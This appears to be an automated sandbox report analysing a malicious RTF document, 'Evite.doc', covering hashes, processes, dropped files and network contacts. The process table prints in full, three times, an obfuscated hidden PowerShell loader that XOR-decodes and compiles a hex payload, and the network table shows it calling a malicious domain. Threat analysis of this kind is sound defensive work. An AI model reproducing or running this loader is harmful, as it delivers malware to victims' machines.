File name: | Evite.doc |
Full analysis: | https://app.any.run/tasks/5f55351c-94f3-47e8-89db-d979357b4461 |
Verdict: | Malicious activity |
Analysis date: | December 02, 2019, 16:57:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 7D2CD4A5E10B4E6A86B53DC7532D88E7 |
SHA1: | 28DE9C9264BEEAC443FACB598F28AD9623494F74 |
SHA256: | 2306F5185B372F77E78C24037F029A4B14F52A402BB49AFC27E1A4AFA05C80C9 |
SSDEEP: | 1536:oZdNEOLZyLtjixiWFEOLZyLtjixiWFEOLZyLtjixiWFEOLZyLtjixiWFEOLZyLtg:oHG373737373lotAy |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
960 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Evite.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2212 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3876 | powershell -WindowStyle Hidden function of5fd {param($s58fc)$j763bfd='xc314bf';$c7a2721='';for ($i=0; $i -lt $s58fc.length;$i+=2){$b7d75e=[convert]::ToByte($s58fc.Substring($i,2),16);$c7a2721+=[char]($b7d75e -bxor $j763bfd[($i/2)%$j763bfd.length]);}return $c7a2721;} $nf8922 = '0d105a5f534235011047545959130b0a5d5614311f0b17565c1a301316175a5c514c2f161756435b12351d114558570715431640585a05462b1a4045510f483c0a52565a0d150c0a50420f1715110d5411671b150c065e1f7d2d5d0d105a5f53423501104754594c281d17083c3e12131a0f5a5214010a191040115650544f5702034f3922140f7a5c440d140c4b115a5110081d0f0003164e2316174148640d0f16170e1373071228115c527506020a064042164b3b58134653580b0558104750400b0558064b45511008582a5d456416145811040902544e310d47614010461f010557574e150c115a5f53421e1c510509064b5d23275f5d7d0f16171147191609030a0d565d0750445443765f40101f280c5a5f40425b58417f5e55062a11014150461b44513e134141000a11001342400312110013544c16030a0d13785a16360c11134b075a541c4b4045460b081f4351555550551a4a086a700e0a310e435e46164e5a0856435a070a4b51111d1427080c114a615b0b080c5e11675d10120d025f61460d121d0047131d3f460816515d5d01460b1752455d01461d1b4754460c461a0c5c5d14075e19070153034a2f1617634546420d410250520d5b4a2d2a5d4564161458070b54005b55544346585a16461b00065000504a580c464514170f1617134152570049541a0a6f260a142a5e415b101250417854460c031450011f500e0a5a4f13745a161401335c585a165b5a31475d790d101d2e565c5b101f5a4f136251162a191047744610090a5e5550581103513e1342400312110013544c16030a0d13475b0b0258150555525451502a5d456416145808555700534a310d476140104616020052574e0f161713490c51571c501a0a441704140a50114716070c0a50115d0c1258000452055a4e51187a5f4032120a4341090654524957130c141855405157195b04531e071b13055b561d5703040c530748550350055644514a0858524a144051050505565b452a5d45641614563956435b4b1d1f0c475e1416534c02015456591b310d47614010460e555100505f144f5b05071c105e4a550700004e091e5655551c40554153560504575e4e5403000455574e5102050257514d510306055644514a0858524a104e010255095f2f16176345464c3c1d115c184f05090c0c13450156074a06510a49372f1617634546420b4c540503065f4e2d2a5d45641614515608445d0c125819000406545b48585a571c43034002570356554e0e555100504e0b4c540503064e560057031d5b17125819000406544f5118545e400d460c560750060704431e714840073d2543495001545e49540e4a041a55494f034952044a481b0a0149592f161763454642084e070008092f070a105b50584c27140f5c527c250a1701525d1c514f432e5243470a07144d705e441b4e020206070c535154531f5f020655414f00180f14501c0505061c0c030f437a5f4032120a4b450756530256375c785a16504c4b1a1a041a5648525118180c501c500a1d074b5d0c5607500607044243645456210a11065d451412551e01550c5a071158345653770e0f1d0d47191d59150c115a5f5342074e070006565f2316155a435b0c0b1d0d471f7307123e0c5f5551103619175b19710c1011115c5f5907080c4d604151010f190f755e5806030a4d7241440e0f1b0247585b0c22191752181f403a240e0a040d5444530c550452064e5a5605010256044d5711180f12551e01551f700d11160f5c5050240f14061b5e5257001c4b11000453514c54070000555340570a040353554d5306010006564b5356000d52524d5502570155561c5351040352564c5207090052561c560705565751490706050001564f411a1d5554024b5451180f321417005642473112191147785a040958095154505650450d564614321417005642473112191147785a040950020555075504515863435b01030b101d624003140c4b59535106524e4a08435116130a0d13010f1f160d015f585742150c0247585742150c115a5f5342091e5655551c11120a0a5d56141304405000021d19150c115a5f5342011a55555209401e1b500205560444431047435d0c015819000906065b2b1741585a05483d0e43454d590017111b585a1646115e030a5d5e171a5b0002074c2a1d0d54455c590f535e01184f001f0c061343035a504e5e705e5a14030a171d655b201f0c061b40565a554b501d624100150c115a5f534a0f54511a1d05544f4319000906064d454b505955104f5011040902544626435453020405234b5a1e064b465d435453020405562f565f53160e254a084c4607120d115d114e515e4a07084c49'; $nf89222 = of5fd($nf8922); Add-Type -TypeDefinition $nf89222; [b227412]::c7c18(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2248 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2840 | powershell -WindowStyle Hidden function of5fd {param($s58fc)$j763bfd='xc314bf';$c7a2721='';for ($i=0; $i -lt $s58fc.length;$i+=2){$b7d75e=[convert]::ToByte($s58fc.Substring($i,2),16);$c7a2721+=[char]($b7d75e -bxor $j763bfd[($i/2)%$j763bfd.length]);}return $c7a2721;} $nf8922 = '0d105a5f534235011047545959130b0a5d5614311f0b17565c1a301316175a5c514c2f161756435b12351d114558570715431640585a05462b1a4045510f483c0a52565a0d150c0a50420f1715110d5411671b150c065e1f7d2d5d0d105a5f53423501104754594c281d17083c3e12131a0f5a5214010a191040115650544f5702034f3922140f7a5c440d140c4b115a5110081d0f0003164e2316174148640d0f16170e1373071228115c527506020a064042164b3b58134653580b0558104750400b0558064b45511008582a5d456416145811040902544e310d47614010461f010557574e150c115a5f53421e1c510509064b5d23275f5d7d0f16171147191609030a0d565d0750445443765f40101f280c5a5f40425b58417f5e55062a11014150461b44513e134141000a11001342400312110013544c16030a0d13785a16360c11134b075a541c4b4045460b081f4351555550551a4a086a700e0a310e435e46164e5a0856435a070a4b51111d1427080c114a615b0b080c5e11675d10120d025f61460d121d0047131d3f460816515d5d01460b1752455d01461d1b4754460c461a0c5c5d14075e19070153034a2f1617634546420d410250520d5b4a2d2a5d4564161458070b54005b55544346585a16461b00065000504a580c464514170f1617134152570049541a0a6f260a142a5e415b101250417854460c031450011f500e0a5a4f13745a161401335c585a165b5a31475d790d101d2e565c5b101f5a4f136251162a191047744610090a5e5550581103513e1342400312110013544c16030a0d13475b0b0258150555525451502a5d456416145808555700534a310d476140104616020052574e0f161713490c51571c501a0a441704140a50114716070c0a50115d0c1258000452055a4e51187a5f4032120a4341090654524957130c141855405157195b04531e071b13055b561d5703040c530748550350055644514a0858524a144051050505565b452a5d45641614563956435b4b1d1f0c475e1416534c02015456591b310d47614010460e555100505f144f5b05071c105e4a550700004e091e5655551c40554153560504575e4e5403000455574e5102050257514d510306055644514a0858524a104e010255095f2f16176345464c3c1d115c184f05090c0c13450156074a06510a49372f1617634546420b4c540503065f4e2d2a5d45641614515608445d0c125819000406545b48585a571c43034002570356554e0e555100504e0b4c540503064e560057031d5b17125819000406544f5118545e400d460c560750060704431e714840073d2543495001545e49540e4a041a55494f034952044a481b0a0149592f161763454642084e070008092f070a105b50584c27140f5c527c250a1701525d1c514f432e5243470a07144d705e441b4e020206070c535154531f5f020655414f00180f14501c0505061c0c030f437a5f4032120a4b450756530256375c785a16504c4b1a1a041a5648525118180c501c500a1d074b5d0c5607500607044243645456210a11065d451412551e01550c5a071158345653770e0f1d0d47191d59150c115a5f5342074e070006565f2316155a435b0c0b1d0d471f7307123e0c5f5551103619175b19710c1011115c5f5907080c4d604151010f190f755e5806030a4d7241440e0f1b0247585b0c22191752181f403a240e0a040d5444530c550452064e5a5605010256044d5711180f12551e01551f700d11160f5c5050240f14061b5e5257001c4b11000453514c54070000555340570a040353554d5306010006564b5356000d52524d5502570155561c5351040352564c5207090052561c560705565751490706050001564f411a1d5554024b5451180f321417005642473112191147785a040958095154505650450d564614321417005642473112191147785a040950020555075504515863435b01030b101d624003140c4b59535106524e4a08435116130a0d13010f1f160d015f585742150c0247585742150c115a5f5342091e5655551c11120a0a5d56141304405000021d19150c115a5f5342011a55555209401e1b500205560444431047435d0c015819000906065b2b1741585a05483d0e43454d590017111b585a1646115e030a5d5e171a5b0002074c2a1d0d54455c590f535e01184f001f0c061343035a504e5e705e5a14030a171d655b201f0c061b40565a554b501d624100150c115a5f534a0f54511a1d05544f4319000906064d454b505955104f5011040902544626435453020405234b5a1e064b465d435453020405562f565f53160e254a084c4607120d115d114e515e4a07084c49'; $nf89222 = of5fd($nf8922); Add-Type -TypeDefinition $nf89222; [b227412]::c7c18(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1188 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2912 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\_1ryzopv.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3996 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESB9E5.tmp" "c:\Users\admin\AppData\Local\Temp\CSCB9E4.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2136 | powershell -WindowStyle Hidden function of5fd {param($s58fc)$j763bfd='xc314bf';$c7a2721='';for ($i=0; $i -lt $s58fc.length;$i+=2){$b7d75e=[convert]::ToByte($s58fc.Substring($i,2),16);$c7a2721+=[char]($b7d75e -bxor $j763bfd[($i/2)%$j763bfd.length]);}return $c7a2721;} $nf8922 = '0d105a5f534235011047545959130b0a5d5614311f0b17565c1a301316175a5c514c2f161756435b12351d114558570715431640585a05462b1a4045510f483c0a52565a0d150c0a50420f1715110d5411671b150c065e1f7d2d5d0d105a5f53423501104754594c281d17083c3e12131a0f5a5214010a191040115650544f5702034f3922140f7a5c440d140c4b115a5110081d0f0003164e2316174148640d0f16170e1373071228115c527506020a064042164b3b58134653580b0558104750400b0558064b45511008582a5d456416145811040902544e310d47614010461f010557574e150c115a5f53421e1c510509064b5d23275f5d7d0f16171147191609030a0d565d0750445443765f40101f280c5a5f40425b58417f5e55062a11014150461b44513e134141000a11001342400312110013544c16030a0d13785a16360c11134b075a541c4b4045460b081f4351555550551a4a086a700e0a310e435e46164e5a0856435a070a4b51111d1427080c114a615b0b080c5e11675d10120d025f61460d121d0047131d3f460816515d5d01460b1752455d01461d1b4754460c461a0c5c5d14075e19070153034a2f1617634546420d410250520d5b4a2d2a5d4564161458070b54005b55544346585a16461b00065000504a580c464514170f1617134152570049541a0a6f260a142a5e415b101250417854460c031450011f500e0a5a4f13745a161401335c585a165b5a31475d790d101d2e565c5b101f5a4f136251162a191047744610090a5e5550581103513e1342400312110013544c16030a0d13475b0b0258150555525451502a5d456416145808555700534a310d476140104616020052574e0f161713490c51571c501a0a441704140a50114716070c0a50115d0c1258000452055a4e51187a5f4032120a4341090654524957130c141855405157195b04531e071b13055b561d5703040c530748550350055644514a0858524a144051050505565b452a5d45641614563956435b4b1d1f0c475e1416534c02015456591b310d47614010460e555100505f144f5b05071c105e4a550700004e091e5655551c40554153560504575e4e5403000455574e5102050257514d510306055644514a0858524a104e010255095f2f16176345464c3c1d115c184f05090c0c13450156074a06510a49372f1617634546420b4c540503065f4e2d2a5d45641614515608445d0c125819000406545b48585a571c43034002570356554e0e555100504e0b4c540503064e560057031d5b17125819000406544f5118545e400d460c560750060704431e714840073d2543495001545e49540e4a041a55494f034952044a481b0a0149592f161763454642084e070008092f070a105b50584c27140f5c527c250a1701525d1c514f432e5243470a07144d705e441b4e020206070c535154531f5f020655414f00180f14501c0505061c0c030f437a5f4032120a4b450756530256375c785a16504c4b1a1a041a5648525118180c501c500a1d074b5d0c5607500607044243645456210a11065d451412551e01550c5a071158345653770e0f1d0d47191d59150c115a5f5342074e070006565f2316155a435b0c0b1d0d471f7307123e0c5f5551103619175b19710c1011115c5f5907080c4d604151010f190f755e5806030a4d7241440e0f1b0247585b0c22191752181f403a240e0a040d5444530c550452064e5a5605010256044d5711180f12551e01551f700d11160f5c5050240f14061b5e5257001c4b11000453514c54070000555340570a040353554d5306010006564b5356000d52524d5502570155561c5351040352564c5207090052561c560705565751490706050001564f411a1d5554024b5451180f321417005642473112191147785a040958095154505650450d564614321417005642473112191147785a040950020555075504515863435b01030b101d624003140c4b59535106524e4a08435116130a0d13010f1f160d015f585742150c0247585742150c115a5f5342091e5655551c11120a0a5d56141304405000021d19150c115a5f5342011a55555209401e1b500205560444431047435d0c015819000906065b2b1741585a05483d0e43454d590017111b585a1646115e030a5d5e171a5b0002074c2a1d0d54455c590f535e01184f001f0c061343035a504e5e705e5a14030a171d655b201f0c061b40565a554b501d624100150c115a5f534a0f54511a1d05544f4319000906064d454b505955104f5011040902544626435453020405234b5a1e064b465d435453020405562f565f53160e254a084c4607120d115d114e515e4a07084c49'; $nf89222 = of5fd($nf8922); Add-Type -TypeDefinition $nf89222; [b227412]::c7c18(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4012 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
960 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA821.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2212 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB020.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2248 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB541.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5QFZ71DQVQJU3W8DC7BA.temp | — | |
MD5:— | SHA256:— | |||
1188 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB8BB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2912 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB9E4.tmp | — | |
MD5:— | SHA256:— | |||
2912 | csc.exe | C:\Users\admin\AppData\Local\Temp\_1ryzopv.pdb | — | |
MD5:— | SHA256:— | |||
2840 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9KCAQC9KJ2U6ZE1QFIIV.temp | — | |
MD5:— | SHA256:— | |||
3996 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB9E5.tmp | — | |
MD5:— | SHA256:— | |||
2912 | csc.exe | C:\Users\admin\AppData\Local\Temp\_1ryzopv.dll | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3876 | powershell.exe | 206.217.131.250:443 | pcayahage.com | ColoCrossing | US | malicious |
492 | powershell.exe | 206.217.131.250:443 | pcayahage.com | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
pcayahage.com |
| unknown |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|